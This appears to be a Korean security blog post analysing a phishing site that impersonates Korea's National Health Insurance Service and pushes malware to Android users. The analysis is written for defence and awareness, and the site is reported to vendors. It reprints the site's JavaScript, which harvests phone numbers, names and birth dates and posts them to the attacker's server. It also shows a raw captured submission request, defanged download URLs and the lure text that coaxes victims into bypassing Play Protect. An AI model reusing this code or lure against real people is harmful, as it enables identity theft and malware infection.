오늘은 국민건강보험 공단 피싱 사이트 인 nhtagse(.)store 에 대해 글을 적어 보겠습니다.
일단 예전에는 윈도우 환경에서 들어오면 해당 사이트를 국민건강보험으로 넘어가던 것이 번은 윈도우 환경에서도 접속되었습니다.
안드로이드이고 컴퓨터이고 애플 아이폰이든 접속을 하고 파일을 다운로드 할 수가 있지만, 악성코드는 안드로이드 스마트폰 사용자를 노리는 사이트입니다. 물론 해당 애플 아이폰 사용자 분들은 악성코드는 설치할 수가 없지만, 전화번호를 입력하면 다른 전화금융사기를 통해서 피해가 우려될 수도 있습니다.
예전에는 KMI 한국의학연구소로 넘겨 버렸는데 이제는 진짜 국민건강보험공단으로 날려 버립니다.
한마디로 오직 안드로이드 스마트폰을 사용하는 분들을 공격하기 위해서 만들어진 것 같습니다.
일단은 해당 사이트에 인증서는 없어서 금방 피싱(Phishing) 이라는 것을 눈치를 챌 수가 있을 것입니다.
유포 사이트는 다음과 같습니다.
http://nhtagse(.)store/
기본적인 피싱 방법은 간단합니다. 먼저 해당 사이트에 접속하면 묻지도 않고 그냥 전화번호를 입력을 요구합니다.
그리고 조회를 입력하면 다음과 같이 이름, 생년월일을 입력하라고 합니다. 해당 방법은 몇 년이 지나도 똑같은 느낌이 드네요.
여기서 생년월일을 잘못 입력하면 다음과 같은 화면을 볼 수가 있는데 보면 한국어가 이상한 것을 확인할 수가 있습니다.
생년월일을 정화하게 입력하세요.
이것을 확인하기 위해서 common(.)js를 열어보면 됩니다.
그러면 다음과 같은 자바스크립트가 있는 것을 확인할 수가 있습니다.
function gourl(o,n){n?window.open(o):window.location.href=o}
function form_Search(){var o=/^\d{4}$/(,)n=document.location.hostname,e=
$("input[name='mobile_no1']").val()(+)$("input[name='mobile_no2']").
val()+$("input[name='mobile_no3']")(.)val();return o.test($("input
[name='mobile_no2']").val())?o.test(($)("input[name='mobile_no3']").
val())?void $.ajax({url:"/XmsWeb/ConfirmPhoneNo"(,)type:"POST",dataType:"json",
timeout:15e3,data:{phoneNo:e,domain:n}(,0success:function(o){localStorage.phone=e,
gourl("/info.html")},error:function()
{alert("네트워크가 비정상입니다. 네트워크를 확인하십시오.")}}):
(alert("핸드폰 번호를 입력하시고 건강검진서를 확인해주세요."),
void $("input[name='mobile()_no3']").
focus()):(()alert("핸드폰 번호를 입력하시고 건강검진서를 확인해주세요."),
void $("input[name='mobile_no2']").focus())}function finish(){var o=/^\d{6}$/,
n=$("input[name='name']").val(),e=$("input[name='birth']").val();return n.length<2||
n.length>5?(alert("실명 입력이 필요 합니다."),void $("input[name='name']").
focus()):o.test(e)?void $.ajax({url:"/XmsWeb/Submit",type:"POST",dataType:"json",
timeout:15e3,data:{phoneNo:localStorage.phone,name:n,birth:e},success:function(o)
{1==o.Status?gourl("/finish.html"):alert(o.Message)},error:function(){alert
("네트워크가 비정상입니다. 네트워크를 확인하십시오.")}}):
(alert("생년월일을 정화하게 입력하세요."),
void $("input[name='birth']").focus())}function browse(){$
.ajax({url:"/XmsWeb/Confirm",type:"POST",dataType:"json",
timeout:15e3,data:{domain:window.location.hostname},
success:function(){},error:function(){}})}
function click_download(){$.ajax({type:"POST",url:"/XmsWeb(/)Download"(,)data:
{domain:window.location(.)hostname},success:function(){},error:function(){}})
}localStorage.phone||(localStorage(.)phone="010");해당 자바스크립트를 해석하면 다음과 같습니다.
JavaScript 코드는 웹 페이지에서 양식 제출 및 상호 작용을 처리하는 데 사용
1.gourl(o, n):해당 함수는 매개변수 o 로 전달된 URL로 이동하거나 새 창에서 해당 URL을 열고 매개변수 n 이 true 이면 새 창에서 열고 false이면 현재 창에서 열게 설정
2.form_Search():해당 함수는 양식을 검증하고 서버로 데이터를 전송하는 역할을 하며 핸드폰 번호와 관련된 입력 값을 확인하여 유효성을 검사하고 AJAX를 사용하여 서버에 데이터를 전송
3.finish():해당 함수는 이름과 생년월일을 검증하고 서버로 데이터를 전송하는 역할 입력된 이름과 생년월일을 확인하여 유효성을 검사하고 AJAX를 사용하여 서버에 데이터를 전송함
4. browse(): 해당 함수는 AJAX를 사용하여 현재 페이지의 도메인을 서버에 전송하는 역할
5. click_download(): 해당 함수는 AJAX를 사용하여 현재 페이지의 도메인을 서버에 전송하는 역할
6.localStorage.phone 설정: 해당 코드는 브라우저의 로컬 스토리지를 사용하여 phone 이라는 이름의 데이터를 저장 해당 데이터가 없는 경우 기본 값으로 010을 저장
해당 코드는 웹 페이지에서 사용자의 입력을 처리하고 서버와의 상호 작용을 관리하는 데 사용
개인정보 전송 사이트
http://nhtagse(.)store/XmsWeb/Submit
이며 여기서 보면 개인정보들이 잘 입력이 돼 있는 것을 확인할 수가 있으며 Raw 값은 다음과 같습니다.
POST /XmsWeb/Submit HTTP/1.1
Host: nhtagse(.)store
User-Agent: Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S918N)
AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/22.0.3.1
Chrome/116.0.0.0 Mobile Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Prefer: safe
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://nhtagse(.)store
DNT: 1
Connection: keep-alive
Referer: http://nhtagse(.)store/info.html
Accept-Encoding: gzip, deflate
Content-Length: 74
phoneNo=01012345678&name=%EB%A9%B8%EA%B3%B5%ED%86%B5%EC%9D%BC&birth=591111
입니다.
여기서 이름, 생년월일을 입력하면 다음 과정인 악성코드 다운로드 사이트로 이동하고 다음과 같은 내용을 확인할 수가 있습니다.\
http://nhtagse(.)store/finish.html->http://nhtagse(.)store/XmsWeb/Download
어플을 다운로드후에 설치를 누르시면 권한혀용이 뜹니다. 허용을 해주시면 어플설치할수 있습니다.
Play프로젝트에 의해 차단됨 이라는글이 나올시에는 밑에무시하고 설치를 누르시면 됩니다.
설치방법 다운로드에->설치->어플을찾아서 더블클릭 (또는 클릭) 하여 설치가 가능합니다.
*금년도 검진대상이 확인된 분은 신분증을 지참하고 검진기관에 방문하셔도 검진이 가능합니다.
검진표를 분실하거나 수령치 못한경우에는 1577-1000번이나 가까운 지사에 신청하시면 검진대상자 확인서를 발급해 드립니다.
여기서 악성코드 설치를 유도하기 위해서 안드로이드 스마트폰 보안 설정인 외부 앱 설치를 하려는 방법을 가르쳐 주고 있습니다.
여기서 악성코드는 자신이 입력한 번호가 이름인 파일을 다운로드를 진행을 합니다.
최종적으로 악성코드가 다운로드가 되는 사이트는 다음과 같습니다.
http://nhtagse(.)store/download일단 2023-08-26 19:11:21 UTC 기준 바이러스토탈에서 검출되는 보안 업체은 러시아 카스퍼스키(Kaspersky)한군데만 Phishing으로 탐지를 하고 있으며 나머지 보안 업체들은 탐지하고 있지 않습니다.
그래서 언제나 Eset,Norton,Avira,Emsisoft,Google Safebrowsing,마이크로소프트 스마트스크린(SmartScreen)에 신고를 했으며 일단 보안 업체에서 검토 후 피싱 사이트를 차단을 할 것입니다.
일단 기본적으로 기본적인 보안 수칙을 지키는 것이 안전하게 스마트폰 및 컴퓨터를 사용하는 방법일 것입니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 북한 해킹 단체 Reaper(리퍼)에서 만든 후쿠시마 오염수 방류(후쿠시마 처리수) 내용을 악용한 악성코드-1.chm(2023.9.5) (0) | 2023.09.07 |
|---|---|
| 트론(TRX) 에어드랍 위장한 피싱 사이트-USDT 에어드랍(2023.8.31) (0) | 2023.09.07 |
| 핀뱅크 개인정보 탈취 목적으로 제작이 된 악성코드-이자조회.html(2023.09.04) (0) | 2023.09.05 |
| 삼성 브라우저를 위장 하고 있는 스마트폰 악성코드-인터넷.apk(국민건강공단 피싱앱) (0) | 2023.09.04 |
| 국민건강보험 공단 피싱 사이트 분석-yhasns(.)lol(2023.9.2) (0) | 2023.09.03 |
| Konni(코니) 북한대학원대학교 타겟으로 만든 악성코드-2023-2-주차등록신청서-학생용.hwp(2023.8.30) (0) | 2023.09.01 |
| 주문서로 위장한 악성코드-Order 21739282.xlam(2023.8.15) (0) | 2023.09.01 |
| 파이어폭스 117(Firefox 117) 보안 업데이트 번역 기능 추가 (0) | 2023.08.30 |
